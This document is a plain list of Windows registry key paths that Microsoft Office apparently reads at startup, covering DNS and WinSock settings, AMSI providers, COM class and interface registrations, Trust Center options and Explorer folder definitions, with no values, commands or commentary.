HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\TestMode_AdaptiveTimeoutRecalculationInterval
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\WinSock_Registry_Version
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\AutodialDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\AMSI\Providers2
HKEY_LOCAL_MACHINE\Software\Microsoft\AMSI\Providers2
HKEY_CURRENT_USER\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{E7D35CFA-348B-485E-B524-252725D697CA}\InProcHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{027947E1-D731-11CE-A357-000000000001}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\Elevation
HKEY_CURRENT_USER\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{1C1C45EE-4395-11D2-B60B-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Avalon.Graphics
HKEY_LOCAL_MACHINE\Software\Microsoft\Avalon.Graphics
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\SplashScreenLicense
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\OneAuthConfigCache\MsaSignUpUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\MaxProcessInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\ProcessInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\LicenseCategoryInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Fonts\CloudFontsURL
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountWamAad
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{dcb00c01-570f-4a9b-8d69-199fdba5723b}\InsecureQI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\FileIO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\TrustedSiteUrlForUserAgentVersionInfo
HKEY_CURRENT_USER\Control Panel\International\Calendars\TwoDigitYearMax
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Sort
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\TrustCenter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\TrustCenter\EnableLogging
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Documents\DisableTrustedDocuments
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SmartList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Gfx
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Gfx
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options\FontSmoothingThreshold
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Word\Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Wow6432Node\Microsoft\Windows\Tablet PC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Tablet PC
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\Tablet PC\IsTabletPC
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Office Graphics
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Office Graphics
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_CURRENT_USER\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\AppID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\Elevation
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcHandler32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529A9E6B-6587-4F23-AB9E-9C7D683E3C50}\InProcHandler
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{529a9e6b-6587-4f23-ab9e-9c7d683e3c50}\InsecureQI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\OOBE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\OOBE\LaunchUserOOBE
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\DocumentSyncTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Internet\WinHttpSecureProtocols
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\FolderTypeID
